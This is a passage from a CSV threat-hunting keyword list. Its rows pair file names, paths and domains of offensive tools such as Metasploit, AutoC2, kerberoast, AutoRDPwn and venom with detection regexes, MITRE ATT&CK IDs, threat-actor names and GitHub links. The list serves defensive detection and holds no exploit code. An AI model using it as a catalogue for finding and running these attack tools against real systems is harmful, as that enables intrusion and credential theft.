security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34272" "*auto_target_linux.rb*",".{0,1000}auto_target_linux\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34273" "*auto_target_windows.rb*",".{0,1000}auto_target_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34274" "*autobloody -*",".{0,1000}autobloody\s\-.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","34275" "*autobloody.py*",".{0,1000}autobloody\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","34276" "*autobloody-main*",".{0,1000}autobloody\-main.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","34277" 
"*AutoBypass.ps1*",".{0,1000}AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","34278" "*AutoC2.sh*",".{0,1000}AutoC2\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34279" "*AutoC2/All.sh*",".{0,1000}AutoC2\/All\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34280" "*AutoC2/C2*",".{0,1000}AutoC2\/C2.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34281" "*AutoC2/Dependencies*",".{0,1000}AutoC2\/Dependencies.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know 
and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34282" "*AutoC2/Initial_Access*",".{0,1000}AutoC2\/Initial_Access.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34283" "*AutoC2/Lateral.sh*",".{0,1000}AutoC2\/Lateral\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34284" "*AutoC2/Payload_Development*",".{0,1000}AutoC2\/Payload_Development.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34285" "*AutoC2/Recon*",".{0,1000}AutoC2\/Recon.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34286" "*AutoC2/Situational_Awareness*",".{0,1000}AutoC2\/Situational_Awareness.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34287" "*AutoC2/Social.sh*",".{0,1000}AutoC2\/Social\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34288" "*AutoC2/Staging*",".{0,1000}AutoC2\/Staging.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34289" "*AutoC2/Web.sh*",".{0,1000}AutoC2\/Web\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34290" 
"*AutoC2/Wireless.sh*",".{0,1000}AutoC2\/Wireless\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34291" "*AutoC2/Wordlists*",".{0,1000}AutoC2\/Wordlists.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34292" "*AutoCompletionHandlerC2ServerManager*",".{0,1000}AutoCompletionHandlerC2ServerManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34293" "*AutoCrypt_Password.txt*",".{0,1000}AutoCrypt_Password\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34294" 
"*autodiscover/brute.go*",".{0,1000}autodiscover\/brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","34295" "*autoexploit.rc*",".{0,1000}autoexploit\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34296" "*autokerberoast.ps1*",".{0,1000}autokerberoast\.ps1.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34302" "*autokerberoast_noMimikatz.ps1",".{0,1000}autokerberoast_noMimikatz\.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34303" "*autoKirbi2hashcat.py*",".{0,1000}autoKirbi2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34304" 
"*autolace.twilightparadox.com*",".{0,1000}autolace\.twilightparadox\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34305" "*automachine.servequake.com*",".{0,1000}automachine\.servequake\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34306" "*AutoNSE*",".{0,1000}AutoNSE.{0,1000}","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. 
For more information see https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34307" "*autopwn*",".{0,1000}autopwn.{0,1000}","offensive_tool_keyword","autopwn","tools for pentesters. autopwn is designed to make a pentester's life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well.","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tool","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","N/A","4","389","89","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z","34308" "*AutoPwnKey Agent Manager*",".{0,1000}AutoPwnKey\sAgent\sManager.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34309" "*AutoPwnKey.AgentManager*",".{0,1000}AutoPwnKey\.AgentManager.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34310" "*autopwnkey.db*",".{0,1000}autopwnkey\.db.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34311" "*AutoPwnKey-agent*",".{0,1000}AutoPwnKey\-agent.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34312" "*AutoPwnKey-server*",".{0,1000}AutoPwnKey\-server.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34313" "*AutoPwnKey-server/logs*",".{0,1000}AutoPwnKey\-server\/logs.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - 
T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34314" "*AutoRDPwn*",".{0,1000}AutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","34315" "*AutoRDPwn.ps1*",".{0,1000}AutoRDPwn\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","34316" "*autorecon -t *",".{0,1000}autorecon\s\-t\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","34317" "*AutoRecon\autorecon.py*",".{0,1000}AutoRecon\\autorecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network 
reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","34318" "*AutoSmuggle.csproj*",".{0,1000}AutoSmuggle\.csproj.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34319" "*AutoSmuggle.exe*",".{0,1000}AutoSmuggle\.exe.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34320" "*AutoSmuggle.sln*",".{0,1000}AutoSmuggle\.sln.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34321" "*AutoSmuggle-master*",".{0,1000}AutoSmuggle\-master.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34322" "*autostart/ares.desktop*",".{0,1000}autostart\/ares\.desktop.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","34323" "*AutoSUID-main.*",".{0,1000}AutoSUID\-main\..{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","34324" "*autoTGS_NtlmCrack.py*",".{0,1000}autoTGS_NtlmCrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34325" "*aux/dump_credentials*",".{0,1000}aux\/dump_credentials.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34328" "*aux/enum_system.rc*",".{0,1000}aux\/enum_system\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34329" "*aux/msf/*",".{0,1000}aux\/msf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - 
TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34330" "*aux/persistence.rc",".{0,1000}aux\/persistence\.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34331" "*aux/privilege_escalation.*",".{0,1000}aux\/privilege_escalation\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34332" "*aux/Start-Webserver.ps1*",".{0,1000}aux\/Start\-Webserver\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34333" "*auxiliary/crawler*",".{0,1000}auxiliary\/crawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34334" "*auxiliary/sqli/*",".{0,1000}auxiliary\/sqli\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and 